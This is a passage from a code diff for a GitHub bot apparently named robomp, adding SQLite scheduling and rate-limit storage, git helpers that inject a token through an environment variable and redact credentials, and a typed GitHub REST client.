repo, ts) VALUES (?, ?, ?, ?)", + (delivery_id, normalized_login, repo, _utcnow()), + ) + return SubmissionAdmission(accepted=True, duplicate=False, used=used + 1) + + def record_submission( + self, + *, + delivery_id: str, + login: str, + repo: str | None, + ) -> bool: + """Idempotently log a queue-worthy submission by `login`. + + Returns False if the delivery_id was already recorded (webhook retry). + """ + now = _utcnow() + with self._lock: + cur = self._conn.execute( + "INSERT OR IGNORE INTO submissions (delivery_id, login, repo, ts) VALUES (?, ?, ?, ?)", + (delivery_id, login.lower(), repo, now), + ) + return cur.rowcount > 0 + + def count_submissions_since(self, login: str, since: str) -> int: + """Count submissions by `login` (case-insensitive) with ts >= `since`.""" + with self._lock: + row = self._conn.execute( + "SELECT COUNT(*) AS n FROM submissions WHERE login=? AND ts>=?", + (login.lower(), since), + ).fetchone() + return int(row["n"]) if row is not None else 0 + + # ---- pending_closures ---- + def upsert_pending_closure( + self, + *, + issue_key: str, + repo: str, + number: int, + comment_id: int, + issue_author: str, + close_at: str, + ) -> None: + """Schedule (or reschedule) a question issue to auto-close. + + A follow-up bot answer on the same issue overwrites the prior schedule: + we always watch the latest comment and can roll the close_at forward. + Resets state to `pending` and clears any prior cancel_reason so a row + previously closed/cancelled becomes a live schedule again. + """ + now = _utcnow() + with self._lock: + self._conn.execute( + """ + INSERT INTO pending_closures + (issue_key, repo, number, comment_id, issue_author, close_at, + state, cancel_reason, created_at, updated_at) + VALUES (?, ?, ?, ?, ?, ?, 'pending', NULL, ?, ?) + ON CONFLICT(issue_key) DO UPDATE SET + repo = excluded.repo, + number = excluded.number, + comment_id = excluded.comment_id, + issue_author = excluded.issue_author, + close_at = excluded.close_at, + state = 'pending', + cancel_reason = NULL, + updated_at = excluded.updated_at + """, + (issue_key, repo, number, comment_id, issue_author.lower(), close_at, now, now), + ) + + def claim_due_closures(self, *, now: str, limit: int = 50) -> list[PendingClosureRow]: + """Atomically flip due `pending` rows to `claimed` and return them. + + Atomic claim prevents two scheduler ticks (or a tick racing a + cancellation) from acting on the same row twice. Caller is responsible + for finalizing each claimed row via `finalize_closure` or returning + it to `pending` via `requeue_claimed_closure` after a transient error. + """ + with self._txn() as conn: + rows = conn.execute( + """ + UPDATE pending_closures + SET state = 'claimed', updated_at = ? + WHERE issue_key IN ( + SELECT issue_key FROM pending_closures + WHERE state = 'pending' AND close_at <= ? + ORDER BY close_at + LIMIT ? + ) + RETURNING issue_key, repo, number, comment_id, issue_author, + close_at, state, cancel_reason, created_at, updated_at + """, + (now, now, int(limit)), + ).fetchall() + return [_pending_closure_from_row(row) for row in rows] + + def finalize_closure( + self, + issue_key: str, + *, + state: PendingClosureState, + reason: str | None, + ) -> None: + """Mark a claimed row terminal (`closed` / `cancelled`).""" + if state not in ("closed", "cancelled"): + raise ValueError(f"finalize_closure: invalid terminal state {state!r}") + with self._lock: + self._conn.execute( + """ + UPDATE pending_closures + SET state = ?, cancel_reason = ?, updated_at = ? + WHERE issue_key = ? + """, + (state, reason, _utcnow(), issue_key), + ) + + def requeue_claimed_closure(self, issue_key: str) -> bool: + """Return a `claimed` row to `pending` so the next tick retries it. + + Used by the scheduler when a transient GitHub error prevents the + close from completing. Only flips `claimed -> pending`; rows in any + other state are left untouched. + """ + with self._lock: + cur = self._conn.execute( + """ + UPDATE pending_closures + SET state = 'pending', updated_at = ? + WHERE issue_key = ? AND state = 'claimed' + """, + (_utcnow(), issue_key), + ) + return cur.rowcount > 0 + + def cancel_pending_closure(self, issue_key: str, *, reason: str) -> bool: + """Cancel a scheduled close. No-op when state is not `pending`. + + A row already `claimed` is left for the scheduler tick that owns it + to finalize — racing a cancel against a claim must not double-write + the row's terminal state. + """ + with self._lock: + cur = self._conn.execute( + """ + UPDATE pending_closures + SET state = 'cancelled', cancel_reason = ?, updated_at = ? + WHERE issue_key = ? AND state = 'pending' + """, + (reason, _utcnow(), issue_key), + ) + return cur.rowcount > 0 + + def get_pending_closure(self, issue_key: str) -> PendingClosureRow | None: + with self._lock: + row = self._conn.execute( + """ + SELECT issue_key, repo, number, comment_id, issue_author, + close_at, state, cancel_reason, created_at, updated_at + FROM pending_closures WHERE issue_key = ? + """, + (issue_key,), + ).fetchone() + return _pending_closure_from_row(row) if row is not None else None + + +_DB_SINGLETON: Database | None = None +_DB_LOCK = threading.Lock() + + +def get_database(path: Path) -> Database: + global _DB_SINGLETON + with _DB_LOCK: + if _DB_SINGLETON is None or _DB_SINGLETON.path != path: + if _DB_SINGLETON is not None: + _DB_SINGLETON.close() + _DB_SINGLETON = Database(path) + return _DB_SINGLETON + + +def close_database() -> None: + global _DB_SINGLETON + with _DB_LOCK: + if _DB_SINGLETON is not None: + _DB_SINGLETON.close() + _DB_SINGLETON = None diff --git a/python/robomp/src/git_ops.py b/python/robomp/src/git_ops.py new file mode 100644 index 000000000..1526f59da --- /dev/null +++ b/python/robomp/src/git_ops.py @@ -0,0 +1,568 @@ +"""Low-level git primitives with ephemeral PAT injection. + +The PAT is supplied through `git --config-env=http.extraHeader=ENVVAR`. Git +expands the env var inside the spawned process; the secret only appears in +the spawned process's environment, never in argv visible to other UIDs via +`/proc/<pid>/cmdline`. The env var is wiped from the parent after each call. + +Used by: +- `robomp.sandbox.LocalGitTransport` for in-process git operations when no + proxy is configured. +- `robomp.proxy.server` for proxied operations on the gh-proxy side. +""" + +from __future__ import annotations + +import base64 +import logging +import os +import platform +import re +import subprocess +from collections.abc import Mapping +from dataclasses import dataclass +from pathlib import Path +from typing import Any +from urllib.parse import urlparse + +log = logging.getLogger(__name__) + +# Per-call env var name. `git --config-env` reads the header value from this +# env entry inside the spawned process — never persisted into `.git/config`. +AUTH_ENV_VAR = "ROBOMP_GIT_HTTP_AUTH" + +_CRED_URL = re.compile(r"(https?://)([^:/@\s]+):([^@/\s]+)@") +_BAD_OBJECT_REF_RE = re.compile( + r"(?:fatal: bad object (?P<bad>refs/[^\s]+)|error: (?P<invalid>refs/[^\s]+) does not point to a valid object!)" +) +_FETCH_PRUNE_REPAIR_ATTEMPTS = 8 + +_SHARED_OMP_GID = 2000 +_AGENT_HOME = Path("/srv/agent-home") + + +def _slot_permissions_active(slot_uid: int | None) -> bool: + return slot_uid is not None and platform.system() == "Linux" and os.geteuid() == 0 + + +def _slot_subprocess_kwargs(slot_uid: int | None) -> dict[str, Any]: + if not _slot_permissions_active(slot_uid): + return {} + assert slot_uid is not None + return {"user": slot_uid, "group": slot_uid, "extra_groups": [_SHARED_OMP_GID], "umask": 0o002} + + +def _append_safe_directory(env: dict[str, str], repo_dir: Path) -> None: + count = int(env.get("GIT_CONFIG_COUNT", "0")) + env[f"GIT_CONFIG_KEY_{count}"] = "safe.directory" + env[f"GIT_CONFIG_VALUE_{count}"] = str(repo_dir) + env["GIT_CONFIG_COUNT"] = str(count + 1) + + +def _local_remote_safe_directory(remote_url: str, *, cwd: Path) -> Path | None: + """Return a local filesystem remote path that git may need whitelisted.""" + raw = remote_url.strip() + if not raw: + return None + if raw.startswith("file://"): + parsed = urlparse(raw) + if parsed.netloc not in ("", "localhost"): + return None + return Path(parsed.path) + if "://" in raw or re.match(r"^[^/\\s]+:", raw): + return None + path = Path(raw) + return path if path.is_absolute() else (cwd / path).resolve() + + +def redact_credentials(text: str | None) -> str: + """Strip `user:password@` from any embedded URL in `text`.""" + if not text: + return text or "" + return _CRED_URL.sub(r"\1***@", text) + + +def _redacted_cmd(cmd: list[str]) -> list[str]: + return [redact_credentials(part) for part in cmd] + + +class GitCommandError(RuntimeError): + """Wraps a failed git subprocess with credentials redacted from argv and stderr.""" + + def __init__(self, cmd: list[str], returncode: int, stdout: str, stderr: str) -> None: + self.returncode = returncode + self.stdout = redact_credentials(stdout) + self.stderr = redact_credentials(stderr) + self.cmd = _redacted_cmd(cmd) + msg = self.stderr.strip() or self.stdout.strip() or f"exit {returncode}" + super().__init__(f"git {' '.join(self.cmd[1:])} failed: {msg}") + + +def _basic_auth_header(token: str) -> str: + """Build the `Authorization: Basic …` header value for a PAT. + + GitHub accepts `x-access-token:<PAT>` over HTTPS Basic auth; that form + works for fine-grained tokens, classic PATs, and GitHub App installation + tokens alike. + """ + raw = f"x-access-token:{token}".encode() + return f"Authorization: Basic {base64.b64encode(raw).decode('ascii')}" + + +_DEFAULT_GIT_TIMEOUT_SECONDS = 120.0 +"""Hard wall-clock cap on any one `git` invocation. Overridable per-call. + +A hung child (auth prompt, network stall, server-side packfile generation +that never finishes) MUST NOT pin the calling thread forever — especially +when the gh-proxy invokes `_run_git` from an executor and bounds its OWN +wait via `asyncio.wait_for`. The asyncio bound returns control to the +event loop, but only this `timeout=` + kill below frees the OS process. +""" + + +def _run_git( + args: list[str], + *, + cwd: Path | None, + token: str | None, + extra_env: Mapping[str, str] | None = None, + safe_directory: Path | None = None, + user: int | None = None, + group: int | None = None, + extra_groups: list[int] | tuple[int, ...] | None = None, + umask: int | None = None, + timeout: float | None = None, +) -> subprocess.CompletedProcess[str]: + """Run `git <args>` with optional PAT injection via `--config-env`. + + A returncode of 0 returns the populated `CompletedProcess`. Non-zero exit + returns the same shape; callers either `_check` it or inspect manually + (e.g. when probing for ref existence). Stdout/stderr are always + credential-redacted before being returned. + + On `timeout` expiry the child (and any descendants spawned by git's + helpers) is killed and `GitCommandError` is raised with a synthetic + returncode (124, matching coreutils `timeout`). `None` uses + `_DEFAULT_GIT_TIMEOUT_SECONDS`. + """ + env: dict[str, str] = {**os.environ, "GIT_TERMINAL_PROMPT": "0"} + if user is not None and _AGENT_HOME.is_dir(): + env["HOME"] = str(_AGENT_HOME) + if extra_env: + env.update(extra_env) + if safe_directory is not None: + _append_safe_directory(env, safe_directory) + + cmd: list[str] = ["git"] + if token: + env[AUTH_ENV_VAR] = _basic_auth_header(token) + cmd.extend(["--config-env", f"http.extraHeader={AUTH_ENV_VAR}"]) + cmd.extend(args) + log.debug("git", extra={"cmd": _redacted_cmd(cmd), "cwd": str(cwd) if cwd else None}) + effective_timeout = _DEFAULT_GIT_TIMEOUT_SECONDS if timeout is None else timeout + subprocess_kwargs: dict[str, Any] = {} + if user is not None: + subprocess_kwargs["user"] = user + if group is not None: + subprocess_kwargs["group"] = group + if extra_groups is not None: + subprocess_kwargs["extra_groups"] = extra_groups + if umask is not None: + subprocess_kwargs["umask"] = umask + try: + proc = subprocess.run( + cmd, + cwd=str(cwd) if cwd else None, + env=env, + check=False, + capture_output=True, + text=True, + timeout=effective_timeout, + **subprocess_kwargs, + ) + except subprocess.TimeoutExpired as exc: + # `subprocess.run` already kills the direct child when the timeout + # fires, but we explicitly re-raise as `GitCommandError` so callers + # don't have to special-case `TimeoutExpired` alongside the regular + # non-zero-exit error path. 124 mirrors GNU `timeout`. + stdout = redact_credentials(exc.stdout or "") if isinstance(exc.stdout, str) else "" + stderr_msg = f"git timed out after {effective_timeout:.0f}s: {' '.join(_redacted_cmd(cmd))}" + raise GitCommandError(cmd, 124, stdout, stderr_msg) from exc + if proc.stdout: + proc.stdout = redact_credentials(proc.stdout) + if proc.stderr: + proc.stderr = redact_credentials(proc.stderr) + return proc + + +def _check(proc: subprocess.CompletedProcess[str], cmd: list[str]) -> subprocess.CompletedProcess[str]: + if proc.returncode != 0: + raise GitCommandError(cmd, proc.returncode, proc.stdout, proc.stderr) + return proc + + +def _git_dir(repo_dir: Path) -> Path | None: + dot_git = repo_dir / ".git" + if dot_git.is_dir(): + return dot_git + if dot_git.is_file(): + try: + text = dot_git.read_text(encoding="utf-8").strip() + except OSError: + return None + prefix = "gitdir:" + if not text.startswith(prefix): + return None + git_dir = Path(text[len(prefix) :].strip()) + return git_dir if git_dir.is_absolute() else (repo_dir / git_dir).resolve() + if (repo_dir / "HEAD").exists() and (repo_dir / "objects").is_dir(): + return repo_dir + return None + + +def _resolve_alternate_path(objects_dir: Path, raw: str) -> Path: + path = Path(raw) + if path.is_absolute(): + return path + return (objects_dir / path).resolve() + + +def _prune_missing_alternates(repo_dir: Path) -> bool: + """Drop object alternates that point at directories no longer mounted. + + The bot never configures alternates for pool clones. If one leaks in from + an external git invocation and points at a temp directory, every later + fetch emits warnings and refs whose objects lived only there become + unreadable. Removing the dead alternate lets the repair path below delete + those broken refs and recover the pool without recloning it. + """ + git_dir = _git_dir(repo_dir) + if git_dir is None: + return False + objects_dir = git_dir / "objects" + alternates = objects_dir / "info" / "alternates" + try: + lines = alternates.read_text(encoding="utf-8").splitlines() + except (OSError, UnicodeDecodeError): + return False + + kept: list[str] = [] + changed = False + for line in lines: + raw = line.strip() + if not raw: + changed = True + continue + if _resolve_alternate_path(objects_dir, raw).is_dir(): + kept.append(line) + else: + changed = True + + if not changed: + return False + try: + if kept: + alternates.write_text("\n".join(kept) + "\n", encoding="utf-8") + else: + alternates.unlink() + except OSError as exc: + log.warning("failed to prune missing git alternates", extra={"repo_dir": str(repo_dir), "error": str(exc)}) + return False + log.warning("pruned missing git alternates", extra={"repo_dir": str(repo_dir)}) + return True + + +def _is_safe_ref_name(ref: str) -> bool: + if not ref.startswith("refs/"): + return False + if any(ch in ref for ch in "\0\r\n\t "): + return False + return all(part not in ("", ".", "..") for part in ref.split("/")) + + +def _bad_refs_from_fetch_output(output: str) -> tuple[str, ...]: + refs: list[str] = [] + seen: set[str] = set() + for match in _BAD_OBJECT_REF_RE.finditer(output): + ref = match.group("bad") or match.group("invalid") or "" + if ref in seen or not _is_safe_ref_name(ref): + continue + seen.add(ref) + refs.append(ref) + return tuple(refs) + + +def _worktrees_holding_refs(repo_dir: Path, refs: tuple[str, ...]) -> dict[str, list[str]]: + """Map each ref in ``refs`` to the worktree paths whose ``HEAD`` is on it. + + A worktree that has the soon-to-be-deleted branch checked out keeps a + stale ``HEAD`` pointer after ``update-ref -d`` succeeds in the shared + refs store. The next ``git fetch`` then re-reports the same "bad object" + error because git inspects every worktree's ``HEAD`` for connectivity. + Removing the offending worktree (or running ``git worktree remove + --force`` on it) clears that pointer so the fetch can recover. + """ + if not refs: + return {} + proc = _run_git(["worktree", "list", "--porcelain"], cwd=repo_dir, token=None) + if proc.returncode != 0: + return {} + refs_set = set(refs) + by_ref: dict[str, list[str]] = {} + current: dict[str, str] = {} + + def _flush() -> None: + branch = current.get("branch") + path = current.get("worktree") + if branch in refs_set and path: + by_ref.setdefault(branch, []).append(path) + + for line in proc.stdout.splitlines(): + if not line.strip(): + _flush() + current.clear() + continue + key, _, val = line.partition(" ") + if key and val: + current[key] = val + _flush() + return by_ref + + +def _remove_worktrees(repo_dir: Path, paths: list[str]) -> None: + for path in paths: + proc = _run_git(["worktree", "remove", "--force", path], cwd=repo_dir, token=None) + if proc.returncode != 0: + log.warning( + "failed to remove worktree during fetch repair", + extra={"repo_dir": str(repo_dir), "worktree": path, "stderr": proc.stderr[:500]}, + ) + continue + log.warning( + "removed worktree during fetch repair", + extra={"repo_dir": str(repo_dir), "worktree": path}, + ) + if paths: + _run_git(["worktree", "prune"], cwd=repo_dir, token=None) + + +def _delete_bad_refs(repo_dir: Path, output: str) -> bool: + bad_refs = _bad_refs_from_fetch_output(output) + if not bad_refs: + return False + holding = _worktrees_holding_refs(repo_dir, bad_refs) + changed = False + for ref in bad_refs: + worktrees = holding.get(ref) or [] + if worktrees: + _remove_worktrees(repo_dir, worktrees) + changed = True + proc = _run_git(["update-ref", "-d", ref], cwd=repo_dir, token=None) + if proc.returncode == 0: + changed = True + log.warning( + "deleted invalid git ref during fetch repair", + extra={"repo_dir": str(repo_dir), "git_ref": ref}, + ) + continue + log.warning( + "failed to delete invalid git ref during fetch repair", + extra={"repo_dir": str(repo_dir), "git_ref": ref, "stderr": proc.stderr[:500]}, + ) + return changed + + +def _repair_fetch_prune_failure(repo_dir: Path, output: str) -> bool: + pruned_alternates = _prune_missing_alternates(repo_dir) + deleted_refs = _delete_bad_refs(repo_dir, output) + return pruned_alternates or deleted_refs + + +# ---------- Public primitives ---------- + + +def clone( + target: Path, + *, + clone_url: str, + default_branch: str, + token: str | None, + safe_directory: Path | None = None, +) -> None: + """Fresh `git clone --filter=blob:none` into `target`.""" + target.parent.mkdir(parents=True, exist_ok=True) + args = [ + "clone", + "--filter=blob:none", + "--no-tags", + "--branch", + default_branch, + clone_url, + str(target), + ] + _check(_run_git(args, cwd=None, token=token, safe_directory=safe_directory), ["git", *args]) + + +def fetch_prune(repo_dir: Path, *, token: str | None, safe_directory: Path | None = None) -> None: + """`git fetch --prune origin` on the shared pool clone. + + Pool clones are long-lived. If a transient git object alternate leaks into + the pool and later disappears, `git fetch` can fail before it has a chance + to refresh from origin because a local ref points at an object that only + existed in that missing alternate. Repair that exact corruption in-place: + drop dead alternates, delete refs Git already reported as invalid, then + retry the fetch. + """ + args = ["fetch", "--prune", "origin"] + _prune_missing_alternates(repo_dir) + last_proc: subprocess.CompletedProcess[str] | None = None + for _ in range(_FETCH_PRUNE_REPAIR_ATTEMPTS): + proc = _run_git(args, cwd=repo_dir, token=token, safe_directory=safe_directory) + if proc.returncode == 0: + return + last_proc = proc + output = f"{proc.stderr}\n{proc.stdout}" + if not _repair_fetch_prune_failure(repo_dir, output): + _check(proc, ["git", *args]) + assert last_proc is not None + _check(last_proc, ["git", *args]) + + +def fetch_ref(repo_dir: Path, ref: str, *, token: str | None, safe_directory: Path | None = None) -> None: + """`git fetch origin <ref>` (best-effort: caller decides to swallow).""" + args = ["fetch", "origin", ref] + proc = _run_git(args, cwd=repo_dir, token=token, safe_directory=safe_directory) + if proc.returncode != 0: + log.debug( + "fetch_ref non-fatal failure", + extra={"ref": ref, "stderr": proc.stderr}, + ) + + +@dataclass(slots=True, frozen=True) +class PushResult: + head: str + branch: str + + +class HeadDriftError(GitCommandError): + """Raised when `expected_head` no longer matches the current HEAD. + + Defends against an attacker landing a commit between the orchestrator's + preflight gates and the actual push. + """ + + +def rev_parse_head( + repo_dir: Path, + *, + safe_directory: Path | None = None, + user: int | None = None, + group: int | None = None, + extra_groups: list[int] | tuple[int, ...] | None = None, + umask: int | None = None, +) -> str: + """Return the SHA of HEAD or raise GitCommandError.""" + args = ["rev-parse", "HEAD"] + proc = _run_git( + args, + cwd=repo_dir, + token=None, + safe_directory=safe_directory, + user=user, + group=group, + extra_groups=extra_groups, + umask=umask, + ) + if proc.returncode != 0: + raise GitCommandError(["git", *args], proc.returncode, proc.stdout, proc.stderr) + return proc.stdout.strip() + + +def push( + repo_dir: Path, + *, + branch: str, + expected_head: str | None, + token: str | None, + slot_uid: int | None = None, + safe_directory: Path | None = None, +) -> PushResult: + """`git push --force-with-lease=<ref>:<sha> --set-upstream origin <branch>` from `repo_dir`. + + The lease is pinned to whatever SHA the local `refs/remotes/origin/<branch>` + currently records — i.e. what the workspace last fetched. The push only + succeeds if origin's `<branch>` still matches that SHA, so a parallel + writer to the same ref (between our last fetch and this push) is detected + and refused even when the push is a fast-forward of HEAD. For a brand-new + branch the local remote-tracking ref is absent, so the lease expects "no + ref on origin" (empty expected value). + + `--force-with-lease` (vs plain `--force`) lets us recover from local + history rewrites (e.g. the agent doing `git commit --amend --reset-author + --no-edit` to fix author identity) while still refusing the push if origin + has moved since our last fetch — i.e. it never clobbers work the bot + didn't see. + + When `expected_head` is supplied, this verifies the *local* HEAD matches + before pushing — anything else means an unexpected commit raced in inside + our own worktree between the orchestrator's preflight and this call, and + the push is aborted with `HeadDriftError`. This is a separate concern from + `--force-with-lease`, which compares against the remote ref. + """ + slot_kwargs = _slot_subprocess_kwargs(slot_uid) + git_safe_directory = safe_directory + if git_safe_directory is None and slot_kwargs: + git_safe_directory = repo_dir + + head = rev_parse_head(repo_dir, safe_directory=git_safe_directory, **slot_kwargs) + if expected_head and head != expected_head: + raise HeadDriftError( + ["git", "push"], + 128, + "", + f"HEAD changed since preflight ({expected_head[:12]} → {head[:12]}); aborting push.", + ) + # Probe the local remote-tracking ref. Missing → first push; we pin the + # lease to the empty value so the push only succeeds if origin still has + # no `<branch>`. Present → pin to that SHA. + probe = _run_git( + ["rev-parse", "--verify", "--quiet", f"refs/remotes/origin/{branch}"], + cwd=repo_dir, + token=None, + safe_directory=git_safe_directory, + **slot_kwargs, + ) + expected_remote = probe.stdout.strip() if probe.returncode == 0 else "" + push_extra_env: dict[str, str] | None = None + origin = _run_git( + ["remote", "get-url", "origin"], cwd=repo_dir, token=None, safe_directory=git_safe_directory, **slot_kwargs + ) + if origin.returncode == 0: + local_remote = _local_remote_safe_directory(origin.stdout, cwd=repo_dir) + if local_remote is not None: + push_extra_env = {} + _append_safe_directory(push_extra_env, local_remote) + lease = f"--force-with-lease=refs/heads/{branch}:{expected_remote}" + args = ["push", lease, "--set-upstream", "origin", branch] + _check( + _run_git( + args, cwd=repo_dir, token=token, extra_env=push_extra_env, safe_directory=git_safe_directory, **slot_kwargs + ), + ["git", *args], + ) + return PushResult(head=head, branch=branch) + + +__all__ = [ + "AUTH_ENV_VAR", + "GitCommandError", + "HeadDriftError", + "PushResult", + "clone", + "fetch_prune", + "fetch_ref", + "push", + "redact_credentials", + "rev_parse_head", +] diff --git a/python/robomp/src/github_backend.py b/python/robomp/src/github_backend.py new file mode 100644 index 000000000..e22a92514 --- /dev/null +++ b/python/robomp/src/github_backend.py @@ -0,0 +1,86 @@ +"""Structural protocol shared by `GitHubClient` and `GitHubProxyClient`. + +Callers (worker, host tools, tasks, server, CLI) reference `GitHubBackend` +so they accept either the direct PAT-bearing REST client or the HMAC-RPC +proxy client without changing signatures. Both impls return the same typed +dataclasses (`IssueInfo`, `RepoInfo`, …) defined in `github_client`. +""" + +from __future__ import annotations + +from typing import Protocol + +from robomp.github_client import ( + CommentInfo, + IssueInfo, + IssueSummary, + PullRequestInfo, + PullRequestReviewInfo, + ReactionInfo, + RepoInfo, + ReviewCommentInfo, +) + + +class GitHubBackend(Protocol): + """Methods every caller in roboomp uses against GitHub.""" + + # ---- reads ---- + async def get_repo(self, repo: str) -> RepoInfo: ... + + async def get_issue(self, repo: str, number: int) -> IssueInfo: ... + + async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]: ... + + async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo: ... + + async def list_issues( + self, + repo: str, + *, + state: str = "open", + limit: int = 30, + ) -> list[IssueSummary]: ... + + async def list_comments(self, repo: str, number: int) -> list[CommentInfo]: ... + + async def list_review_comments(self, repo: str, pr_number: int) -> list[ReviewCommentInfo]: ... + + async def list_pr_reviews(self, repo: str, pr_number: int) -> list[PullRequestReviewInfo]: ... + + async def get_authenticated_login(self) -> str: ... + + # ---- writes ---- + async def post_comment(self, repo: str, number: int, body: str) -> CommentInfo: ... + + async def open_pull_request( + self, + *, + repo: str, + head: str, + base: str, + title: str, + body: str, + draft: bool = False, + maintainer_can_modify: bool = True, + ) -> PullRequestInfo: ... + + async def request_reviewers( + self, + *, + repo: str, + pr_number: int, + reviewers: list[str] | None = None, + team_reviewers: list[str] | None = None, + ) -> None: ... + + async def add_issue_labels(self, repo: str, number: int, labels: list[str]) -> tuple[str, ...]: ... + + async def add_assignees(self, repo: str, number: int, assignees: list[str]) -> None: ... + + async def list_comment_reactions(self, repo: str, comment_id: int) -> tuple[ReactionInfo, ...]: ... + + async def close_issue(self, repo: str, number: int, *, reason: str = "completed") -> None: ... + + +__all__ = ["GitHubBackend"] diff --git a/python/robomp/src/github_client.py b/python/robomp/src/github_client.py new file mode 100644 index 000000000..1a4f429b0 --- /dev/null +++ b/python/robomp/src/github_client.py @@ -0,0 +1,543 @@ +"""Minimal typed GitHub REST client (PAT auth, httpx).""" + +from __future__ import annotations + +import logging +import time +from collections.abc import Mapping +from dataclasses import dataclass +from typing import Any + +import httpx + +log = logging.getLogger(__name__) + +GITHUB_API = "https://api.github.com" +ACCEPT = "application/vnd.github+json" +API_VERSION = "2022-11-28" + + +class GitHubError(RuntimeError): + """Raised on non-2xx responses from GitHub.""" + + def __init__(self, status: int, message: str, *, retry_after: float | None = None) -> None: + super().__init__(f"GitHub {status}: {message}") + self.status = status + self.message = message + self.retry_after = retry_after + + +@dataclass(slots=True, frozen=True) +class IssueInfo: + repo: str + number: int + title: str + body: str + state: str + author: str + labels: tuple[str, ...] + is_pull_request: bool + + +@dataclass(slots=True, frozen=True) +class CommentInfo: + id: int + author: str + body: str + created_at: str + + +@dataclass(slots=True, frozen=True) +class RepoInfo: + full_name: str + default_branch: str + clone_url: str + private: bool + + +@dataclass(slots=True, frozen=True) +class PullRequestInfo: + repo: str + number: int + html_url: str + head_ref: str + base_ref: str + state: str + author: str = "" + head_repo: str = "" + + +@dataclass(slots=True, frozen=True) +class ReviewCommentInfo: + """In-line PR review comment (attached to a file/line).""" + + id: int + author: str + body: str + path: str + line: int | None + created_at: str + + +@dataclass(slots=True, frozen=True) +class PullRequestReviewInfo: + """Top-level PR review (the summary block, not the inline comments).""" + + id: int + author: str + body: str + state: str # APPROVED / CHANGES_REQUESTED / COMMENTED + submitted_at: str + + +@dataclass(slots=True, frozen=True) +class IssueSummary: + """Lightweight projection of an issue for list views (no body).""" + + repo: str + number: int + title: str + state: str + author: str + labels: tuple[str, ...] + comments: int + updated_at: str + created_at: str + html_url: str + + +@dataclass(slots=True, frozen=True) +class ReactionInfo: + """A reaction on an issue/comment. + + `content` is GitHub's reaction string: `+1`, `-1`, `laugh`, `hooray`, + `confused`, `heart`, `rocket`, `eyes`. The auto-close scheduler only + looks at `-1` (👎) reactions from the issue's original author. + """ + + content: str + user_login: str + user_type: str + + +def _parse_retry_after(resp: httpx.Response) -> float | None: + ra = resp.headers.get("retry-after") + if ra: + try: + return float(ra) + except ValueError: + pass + reset = resp.headers.get("x-ratelimit-reset") + if reset: + try: + return max(0.0, float(reset) - time.time()) + except ValueError: + pass + return None + + +class GitHubClient: + """Async + sync facades over a small slice of the GitHub REST API.""" + + def __init__(self, token: str, *, transport: httpx.BaseTransport | None = None) -> None: + self._token = token + self._headers = { + "Authorization": f"Bearer {token}", + "Accept": ACCEPT, + "X-GitHub-Api-Version": API_VERSION, + "User-Agent": "robomp/0.1", + } + self._transport = transport + + def _client(self) -> httpx.Client: + return httpx.Client( + base_url=GITHUB_API, + headers=self._headers, + transport=self._transport, + timeout=httpx.Timeout(30.0, connect=10.0), + follow_redirects=True, + ) + + def _async_client(self) -> httpx.AsyncClient: + return httpx.AsyncClient( + base_url=GITHUB_API, + headers=self._headers, + transport=self._transport, # type: ignore[arg-type] + timeout=httpx.Timeout(30.0, connect=10.0), + follow_redirects=True, + ) + + # ---- request helpers ---- + def _check(self, resp: httpx.Response) -> Any: + if resp.status_code >= 400: + retry_after = _parse_retry_after(resp) + try: + msg = resp.json().get("message", resp.text) + except Exception: + msg = resp.text + raise GitHubError(resp.status_code, str(msg), retry_after=retry_after) + if resp.status_code >= 300: + # Redirect we couldn't (or weren't asked to) follow. GitHub uses 301 + # for transferred repos / issues. Surface as a normal error so host + # tools map it to RpcCommandError instead of mis-parsing the body. + location = resp.headers.get("location", "") + raise GitHubError( + resp.status_code, + f"unexpected redirect to {location!r}; resource may have moved", + ) + if resp.status_code == 204 or not resp.content: + return None + return resp.json() + + def request_sync( + self, method: str, path: str, *, json: Mapping[str, Any] | None = None, params: Mapping[str, Any] | None = None + ) -> Any: + with self._client() as client: + resp = client.request(method, path, json=json, params=params) + return self._check(resp) + + async def request( + self, method: str, path: str, *, json: Mapping[str, Any] | None = None, params: Mapping[str, Any] | None = None + ) -> Any: + async with self._async_client() as client: + resp = await client.request(method, path, json=json, params=params) + return self._check(resp) + + # ---- repos / issues / comments / PRs ---- + async def get_repo(self, repo: str) -> RepoInfo: + data = await self.request("GET", f"/repos/{repo}") + return _repo_from_payload(data) + + async def get_issue(self, repo: str, number: int) -> IssueInfo: + data = await self.request("GET", f"/repos/{repo}/issues/{number}") + return _issue_from_payload(repo, data) + + async def list_closing_pull_requests(self, repo: str, number: int) -> tuple[int, ...]: + """Return PR numbers currently linked to issue ``number`` via "Closes"/"Fixes" + keywords or the Development panel. + + Walks ``GET /repos/{repo}/issues/{N}/timeline`` and computes net + ``connected`` − ``disconnected`` events for sources that are pull + requests. Only PRs whose timeline source carries ``state == "open"`` + are returned — a merged or closed PR no longer needs the bot's work. + + Pagination intentionally skipped: a just-opened issue has at most a + handful of timeline entries, and the bot only consults this on + ``issues.opened`` triage. + """ + data = await self.request( + "GET", + f"/repos/{repo}/issues/{number}/timeline", + params={"per_page": 100}, + ) + linked: set[int] = set() + states: dict[int, str] = {} + for event in data or []: + if not isinstance(event, Mapping): + continue + ev = event.get("event") + source = event.get("source") or {} + src_issue = source.get("issue") if isinstance(source, Mapping) else None + if not isinstance(src_issue, Mapping) or "pull_request" not in src_issue: + continue + pr_number = src_issue.get("number") + if not isinstance(pr_number, int): + continue + states[pr_number] = str(src_issue.get("state") or "open") + if ev == "connected": + linked.add(pr_number) + elif ev == "disconnected": + linked.discard(pr_number) + return tuple(sorted(n for n in linked if states.get(n, "open") == "open")) + + async def get_pull_request(self, repo: str, number: int) -> PullRequestInfo: + data = await self.request("GET", f"/repos/{repo}/pulls/{number}") + return _pr_from_payload(repo, data) + + async def list_issues( + self, + repo: str, + *, + state: str = "open", + limit: int = 30, + ) -> list[IssueSummary]: + """List recent issues for `repo`, newest-updated first. Excludes pull requests. + + `state` is one of `open`, `closed`, `all`. `limit` is capped at 100 by the + GitHub `per_page`; we don't paginate here — the dashboard browse view shows + a recent slice, not every issue ever. + """ + if state not in ("open", "closed", "all"): + raise ValueError(f"invalid state: {state!r}") + per_page = max(1, min(int(limit), 100)) + data = await self.request( + "GET", + f"/repos/{repo}/issues", + params={"state": state, "per_page": per_page, "sort": "updated", "direction": "desc"}, + ) + out: list[IssueSummary] = [] + for item in data or []: + if "pull_request" in item: + continue # GitHub's /issues endpoint also returns PRs; skip them. + user = item.get("user") or {} + labels_raw = item.get("labels") or 